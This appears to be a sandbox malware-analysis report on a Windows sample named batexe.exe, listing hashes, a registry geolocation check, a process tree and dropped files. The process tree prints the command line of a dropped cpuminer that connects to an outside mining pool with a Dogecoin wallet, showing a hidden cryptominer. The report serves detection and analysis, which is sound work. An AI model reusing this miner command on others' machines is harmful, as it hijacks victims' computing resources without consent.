73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 11:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2356	b2e.exe
4076	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4076	cpuminer-sse2.exe
4076	cpuminer-sse2.exe
4076	cpuminer-sse2.exe
4076	cpuminer-sse2.exe
4076	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/392-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 392 wrote to memory of 2356	392	batexe.exe	91
PID 392 wrote to memory of 2356	392	batexe.exe	91
PID 392 wrote to memory of 2356	392	batexe.exe	91
PID 2356 wrote to memory of 4604	2356	b2e.exe	92
PID 2356 wrote to memory of 4604	2356	b2e.exe	92
PID 2356 wrote to memory of 4604	2356	b2e.exe	92
PID 4604 wrote to memory of 4076	4604	cmd.exe	95
PID 4604 wrote to memory of 4076	4604	cmd.exe	95

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:392
- C:\Users\Admin\AppData\Local\Temp\5803.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5803.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5803.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5B10.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5803.tmp\b2e.exe

Filesize
9.6MB

MD5
b040b616665ab19474313141578c5dbb

SHA1
c6a236d60457f620abccc75af2ea06e6ae0afffa

SHA256
859691b8507279e5caa04a02257391e49511fac78eeaff4cc4d110d66df2cc6e

SHA512
44e68b9c9d791ac70140ccf09718a372a25f5d0b973673defab1d9eb6cc83dde46f68f6653eeb5343e73484e6d042c3e56dab14ed000d321da289236cb3f8f65

Download Submit
C:\Users\Admin\AppData\Local\Temp\5803.tmp\b2e.exe

Filesize
2.5MB

MD5
53b2381546f410aeecd91b771e15fdd0

SHA1
34a12ee1ca845ce1f18a8f11e13026008abc912a

SHA256
e46f6de33da317596afb231e2e9aea1a27ecc55c173d2923cc280d5175c6ae0c

SHA512
9f701cde37868724d2c79238346c6045162c2ba1691c37df7a1d854b052c6a1dfa14a0e5ed79bf2340ea64f99d1777e7243c0079f33c5bc631239e0265c6fb06

Download Submit
C:\Users\Admin\AppData\Local\Temp\5803.tmp\b2e.exe

Filesize
4.0MB

MD5
61ea0fee94bdec381a28d5a7ef62720f

SHA1
b8688264cb7220151f425b363414d614574561e3

SHA256
166ebfafebd8c644d638123ece63e85a0fc34e6648779cab587d395061939cd9

SHA512
08b2a7ef27097f4e81259e4953c460457769898b78e99045ad33061505c1b53a1b8251a2d2d19ef1b1f3eaad8daa44ae29664f84f812d0aba08c79360b7eb17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B10.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
384KB

MD5
eb8ea4d2595402528f73410e2c8651ed

SHA1
23abb385032a9317d00c826eb21e0fe6fc802c50

SHA256
fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017

SHA512
7f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
367KB

MD5
201b20a3d32c430b098d413d7e77f318

SHA1
070cda8423b3a265b5811e651be686ee4349d214

SHA256
9a00c12ac4d79973aad8c53621b6cd956f67fd35ab80a16bc05bd8690437091e

SHA512
19d9ff5cb0df173db9ff831543f9da93f3df32f614f09b4e0a08b7279f07b6992c2bfee7625a502aee08fc7162a5a02ac6f9291cec1eacfc003301839e6eadc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
285KB

MD5
c78cca07cd77f906adb2689a228d4609

SHA1
3845dfa1840bc35e9e3056f8bc92fba9fb9e5257

SHA256
1ddfc4b45f4943f6bc9381dd956261955fdfa68683b9b20b1e9977a8780e3c42

SHA512
2fd06ee85f5552e0e47d0a5e8f2e4a6245f43c2230a473a72cc545170ce6426661d629fe521dbbd634ab97a47f2608c674c3efdc393265c32289b99b7e845681

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
282KB

MD5
3f28e09e93518097a8a7d1f788f7bfc8

SHA1
485a5d021510946a230a8b8d97c952c810806907

SHA256
d6bed38406623282dfc80fa7b9b2d6eb9b9516cbca0f02ebdee8fe24a1b837f3

SHA512
d05b19a5d624d6378f63e753b635139e599124fa9a30056000d4eaa69a539ebd580bb45959bb4c38ced3b8cffc22dda8147ade2b8dc82e03291b97c38a531eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
268KB

MD5
b9a1eb93de982c7bd22927f746c4a3f4

SHA1
8da5d261d13468122e9d4236eeece54078ed1b3c

SHA256
86b19bbdda460b7d0a197e71bd13b7da3c8354913ce206a6492c75ebcaaf060d

SHA512
941742229660e065811568894d8a200224043cfc613f09cbcea7364b9ffcf7a0008af8db5a5e92cf1f3e1f3316928c90f54d6ea805cf7ce6754eb01873e06ff7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
148KB

MD5
01ba7e51de4c03ac4636f9fc60763b83

SHA1
2909f9a47110afaafb9fcbad97a96833bd9e7603

SHA256
b528eef580cae7f81a0c3428cc6dae35bfae7a2ac2beffd99b38edccbd9128d4

SHA512
67353b84ed548b6df430a1435c3e3ef456d92f9274ca61ada7947817f1f89161006390e96054c7218f7c2d467566dd1702ac67d5bc30afe97d55d526edbbd510

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
196KB

MD5
13edbc650fc5fb3162206c92ad088af3

SHA1
2d849a5a1f1b39528623325ff73684c49d5dc7d1

SHA256
93d72e50c2f717f7ed18b7b29f880819116eeaf6439e5cf5f24b7a18f8c8e541

SHA512
baaffa2742cc835ed4f1b9f61da089d66393d2b56d47592f5f731e970cc11f7255fe2f72a469309b13f2adec933ad74b3b36d93788ab75577b18fa9ef2b5796e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
176KB

MD5
3f9e51a01039968e7da9e6f5c3d0291b

SHA1
53a63036c93e64ac522e746ca79261a4f5c63692

SHA256
4975cb5a5c45356498ae070a4297e9dfe3bba20f99c503b891fedcfc6a632255

SHA512
2735a16097c87953259f82bbe8424a3931cd1f6f8c19aae074e93e6129bad3d334188a0419ac8d267f334307e6ed69bb0bc4961c8679ba36c0d3081a7c0586d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
172KB

MD5
0436cc26e742b936e9aa577a6096f8d8

SHA1
b10bfde10becfb6ae50925e13cd7ac83e56aacfb

SHA256
0f56f3989ccf3f3217dce7427c7226011f333faff8d5d5246d6d4d876b66942a

SHA512
b46f2e36e3b165cbc87bf95ee84e8d6a36adad8751db92436bf4cecfba0c02fa9a22cc5e08a9982898b8ed70f1652cff32fe234e6faebb95055277a0eebee4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
229KB

MD5
08fddd1523147e94d175547ed7b38862

SHA1
4563d45b4adf90a13a96506e84e27a70b23cfa8d

SHA256
d95aa38dcb579beaf9bac824b3aec54e20b2c32f1ad6efd8a690391c9c0ac5d9

SHA512
e7c3e3bdb20789d7e081ca1baecefe88dcb50ab7b4e768a0f4b2c1096826f2aff53de5b91c130c9f36e1e4b3e1ec94889e9f98410e9bb3bc6d4bd466a426f355

Download Submit
memory/392-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2356-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2356-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4076-47-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/4076-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4076-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4076-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-45-0x0000000066260000-0x00000000662F8000-memory.dmp

Filesize
608KB

Download
memory/4076-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4076-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download